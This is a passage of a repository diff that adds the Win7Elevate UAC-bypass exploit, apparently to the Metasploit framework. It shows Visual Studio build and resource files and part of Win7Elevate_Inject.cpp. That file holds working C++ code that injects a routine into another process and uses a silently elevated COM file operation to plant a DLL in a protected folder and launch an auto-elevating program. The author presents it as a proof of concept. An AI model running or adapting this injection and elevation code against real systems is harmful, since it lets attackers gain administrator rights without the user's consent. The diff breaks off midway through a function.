{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

18
external/source/exploits/bypassuac/Win7Elevate/Resource.h vendored Normal file
View File

@ -0,0 +1,18 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Win7Elevate.rc
//
#define IDD_EMBEDDED_DLL 110
#define IDD_EMBEDDED_TIOR 111
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NO_MFC 1
#define _APS_NEXT_RESOURCE_VALUE 139
#define _APS_NEXT_COMMAND_VALUE 32771
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 111
#endif
#endif

BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp vendored Normal file
View File

Binary file not shown.

82
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc vendored Normal file
View File

@ -0,0 +1,82 @@
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#ifndef APSTUDIO_INVOKED
#include "targetver.h"
#endif
#define APSTUDIO_HIDDEN_SYMBOLS
#include "windows.h"
#undef APSTUDIO_HIDDEN_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (U.S.) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)
#endif //_WIN32
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#ifndef APSTUDIO_INVOKED\r\n"
"#include ""targetver.h""\r\n"
"#endif\r\n"
"#define APSTUDIO_HIDDEN_SYMBOLS\r\n"
"#include ""windows.h""\r\n"
"#undef APSTUDIO_HIDDEN_SYMBOLS\r\0"
END
3 TEXTINCLUDE
BEGIN
"#include ""Win7Elevate.rc2\0"
END
#endif // APSTUDIO_INVOKED
#endif // English (U.S.) resources
/////////////////////////////////////////////////////////////////////////////
#ifdef _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
#endif
#else // _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
#endif
#endif

212
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.vcxproj vendored Normal file
View File

@ -0,0 +1,212 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Win7Elevate</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<MinimalRebuild>false</MinimalRebuild>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<MinimalRebuild>false</MinimalRebuild>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
<ResourceCompile>
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
<ResourceCompile>
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
<ClInclude Include="Win7Elevate_Inject.h" />
<ClInclude Include="Win7Elevate_Utils.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="..\Redirector.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="Win7Elevate.cpp" />
<ClCompile Include="Win7Elevate_Inject.cpp" />
<ClCompile Include="Win7Elevate_Utils.cpp" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

59
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.vcxproj.filters vendored Normal file
View File

@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Win7Elevate_Inject.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Win7Elevate_Utils.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate_Inject.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate_Utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\Redirector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

14
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.vcxproj.user vendored Normal file
View File

@ -0,0 +1,14 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ShowAllFiles>false</ShowAllFiles>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">/c cmd</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">/c cmd</LocalDebuggerCommandArguments>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">WindowsLocalDebugger</DebuggerFlavor>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WindowsLocalDebugger</DebuggerFlavor>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">/c cmd</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/c cmd</LocalDebuggerCommandArguments>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">WindowsLocalDebugger</DebuggerFlavor>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|x64'">WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

455
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp vendored Normal file
View File

@ -0,0 +1,455 @@
#include "stdafx.h"
#include "Win7Elevate_Utils.h"
#include "Win7Elevate_Inject.h"
#include ".\..\CMMN.h"
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
// (Minor tidy-up 12th June 2009 for the code's public release.)
// http://www.pretentiousname.com
// leo@ox.compsoc.net
//
// Using any part of this code for malicious purposes is expressly forbidden.
//
// This proof-of-concept code is intended only to demonstrate that code-injection
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
struct InjectArgs
{
BOOL (WINAPI *fpFreeLibrary)(HMODULE hLibModule);
HMODULE (WINAPI *fpLoadLibrary)(LPCWSTR lpLibFileName);
FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
BOOL (WINAPI *fpCloseHandle)(HANDLE);
DWORD (WINAPI *fpWaitForSingleObject)(HANDLE,DWORD);
const wchar_t *szSourceDll;
const wchar_t *szElevDir;
const wchar_t *szElevDll;
const wchar_t *szElevDllFull;
const wchar_t *szElevExeFull;
wchar_t *szElevArgs; // Not const because of CreateProcess's in-place buffer modification. It's really not const so this is fine. (We don't use CreateProcess anymore but it doesn't hurt to keep this non-const just in case.)
const wchar_t *szEIFOMoniker; // szElevatedIFileOperationMoniker
const IID *pIID_EIFOClass;
const IID *pIID_EIFO;
const IID *pIID_ShellItem2;
const IID *pIID_Unknown;
const wchar_t *szShell32;
const wchar_t *szOle32;
const char *szCoInitialize;
const char *szCoUninitialize;
const char *szCoGetObject;
const char *szCoCreateInstance;
const char *szSHCreateItemFPN; // SHCreateItemFromParsingName
const char *szShellExecuteExW;
};
static DWORD WINAPI RemoteCodeFunc(LPVOID lpThreadParameter)
{
// This is the injected code of "part 1."
// As this code is copied into another process it cannot refer to any static data (i.e. no string, GUID, etc. constants)
// and it can only directly call functions that are within Kernel32.dll (which is all we need as it lets us call
// LoadLibrary and GetProcAddress). The data we need (strings, GUIDs, etc.) is copied into the remote process and passed to
// us in our InjectArgs structure.
// The compiler settings are important. You have to ensure that RemoteCodeFunc doesn't do any stack checking (since it
// involves a call into the CRT which may not exist (in the same place) in the target process) and isn't made inline
// or anything like that. (Compiler optimizations are best turned off.) You need RemoteCodeFunc to be compiled into a
// contiguous chunk of assembler that calls/reads/writes nothing except its own stack variables and what is passed to it via pArgs.
// It's also important that all asm jump instructions in this code use relative addressing, not absolute. Jumps to absolute
// addresses will not be valid after the code is copied to a different address in the target process. Visual Studio seems
// to use absolute addresses sometimes and relative ones at other times and I'm not sure what triggers one or the other. For example,
// I had a problem with it turning a lot of the if-statements in this code into absolute jumps when compiled for 32-bit and that
// seemed to go away when I set the Release build to generate a PDF file, but then they came back again.
// I never had this problem in February, and 64-bit builds always seem fine, but now in June I'm getting the problem with 32-bit
// builds on my main machine. However, if I switch to the older compiler install and older Windows SDK that I have on another machine
// it always builds a working 32-bit (and 64-bit) version, just like it used to. So I guess something in the compiler/SDK has triggered
// this change but I don't know what. It could just be that things have moved around in memory due to a structure size change and that's
// triggering the different modes... I don't know!
//
// So if the 32-bit version crashes the process you inject into, you probably need to work out how to convince the compiler
// to generate the code it used to in February. :) Or you could write some code to fix up the jump instructions after copying them,
// or hand-code the 32-bit asm (seems you can ignore 64-bit as it always works so far), or find a style of if-statement (or equivalent)
// that always generates relative jumps, or whatever...
//
// Take a look at the asm_code_issue.png image that comes with the source to see what the absolute and relative jumps look like.
//
// PS: I've never written Intel assembler, and it's many years since I've hand-written any type of assembler, so I may have the wrong end
// of the stick about some of this! Either way, 32-bit version works when built on my older compiler/SDK install and usually doesn't on
// the newer install.
InjectArgs * pArgs = reinterpret_cast< InjectArgs * >(lpThreadParameter);
// Use an elevated FileOperation object to copy a file to a protected folder.
// If we're in a process that can do silent COM elevation then we can do this without any prompts.
HMODULE hModuleOle32 = pArgs->fpLoadLibrary(pArgs->szOle32);
HMODULE hModuleShell32 = pArgs->fpLoadLibrary(pArgs->szShell32);
if (hModuleOle32
&& hModuleShell32)
{
// Load the non-Kernel32.dll functions that we need.
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPVOID pvReserved) >
tfpCoInitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoInitialize );
W7EUtils::GetProcAddr< void (STDAPICALLTYPE *)(void) >
tfpCoUninitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoUninitialize );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) >
tfpCoGetObject( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoGetObject );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) >
tfpCoCreateInstance( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoCreateInstance );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) >
tfpSHCreateItemFromParsingName( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szSHCreateItemFPN );
W7EUtils::GetProcAddr< BOOL (STDAPICALLTYPE *)(LPSHELLEXECUTEINFOW lpExecInfo) >
tfpShellExecuteEx( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szShellExecuteExW );
if (0 != tfpCoInitialize.f
&& 0 != tfpCoUninitialize.f
&& 0 != tfpCoGetObject.f
&& 0 != tfpCoCreateInstance.f
&& 0 != tfpSHCreateItemFromParsingName.f
&& 0 != tfpShellExecuteEx.f)
{
if (S_OK == tfpCoInitialize.f(NULL))
{
BIND_OPTS3 bo;
for(int i = 0; i < sizeof(bo); ++i) { reinterpret_cast< BYTE * >(&bo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
bo.cbStruct = sizeof(bo);
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
// For testing other COM objects/methods, start here.
{
IFileOperation *pFileOp = 0;
IShellItem *pSHISource = 0;
IShellItem *pSHIDestination = 0;
IShellItem *pSHIDelete = 0;
// This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
if (
(pArgs->szEIFOMoniker && S_OK == tfpCoGetObject.f( pArgs->szEIFOMoniker, &bo, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|| (pArgs->pIID_EIFOClass && S_OK == tfpCoCreateInstance.f( *pArgs->pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER|CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
)
if (0 != pFileOp)
if (S_OK == pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION))
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szSourceDll, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)))
if (0 != pSHISource)
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDir, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)))
if (0 != pSHIDestination)
if (S_OK == pFileOp->CopyItem(pSHISource, pSHIDestination, pArgs->szElevDll, NULL))
if (S_OK == pFileOp->PerformOperations())
{
// Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
// (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
SHELLEXECUTEINFO shinfo;
for(int i = 0; i < sizeof(shinfo); ++i) { reinterpret_cast< BYTE * >(&shinfo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = pArgs->szElevExeFull;
shinfo.lpParameters = pArgs->szElevArgs;
shinfo.lpDirectory = pArgs->szElevDir;
shinfo.nShow = SW_SHOW;
if (tfpShellExecuteEx.f(&shinfo) && shinfo.hProcess != NULL)
{
// Wait for the "part 2" target process to finish.
pArgs->fpWaitForSingleObject(shinfo.hProcess, INFINITE);
pArgs->fpCloseHandle(shinfo.hProcess);
}
// Another standard call to IFileOperation, this time to delete our dummy DLL. We clean up our mess.
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDllFull, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDelete)))
if (0 != pSHIDelete)
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
{
pFileOp->PerformOperations();
}
}
if (pSHIDelete) { pSHIDelete->Release(); }
if (pSHIDestination) { pSHIDestination->Release(); }
if (pSHISource) { pSHISource->Release(); }
if (pFileOp) { pFileOp->Release(); }
}
tfpCoUninitialize.f();
}
}
}
if (hModuleShell32) { pArgs->fpFreeLibrary(hModuleShell32); }
if (hModuleOle32) { pArgs->fpFreeLibrary(hModuleOle32); }
return 0;
}
// Marks the end of the function so we know how much data to copy.
volatile static void DummyRemoteCodeFuncEnd()
{
}
void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
const wchar_t *szPathToOurDll,
DWORD (__stdcall *Redirector)(void))
{
bool bThreadWaitSuccess = false;
bool bThreadWaitFailure = false;
HANDLE hTargetProc = NULL;
const BYTE * codeStartAdr = reinterpret_cast< const BYTE * >( &RemoteCodeFunc );
const BYTE * codeEndAdr = reinterpret_cast< const BYTE * >( &DummyRemoteCodeFuncEnd );
if (codeStartAdr >= codeEndAdr)
{
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Unexpected function layout");
return;
}
wchar_t szPathToSelf[MAX_PATH];
DWORD dwGMFNRes = GetModuleFileName(NULL, szPathToSelf, _countof(szPathToSelf));
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
{
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't get path to self");
return;
}
wchar_t szProgramFiles[MAX_PATH];
HRESULT hr = SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFiles);
if (S_OK != hr)
{
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"SHGetFolderPath failed");
return;
}
HMODULE hModKernel32 = LoadLibrary(L"kernel32.dll");
if (hModKernel32 == 0)
{
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
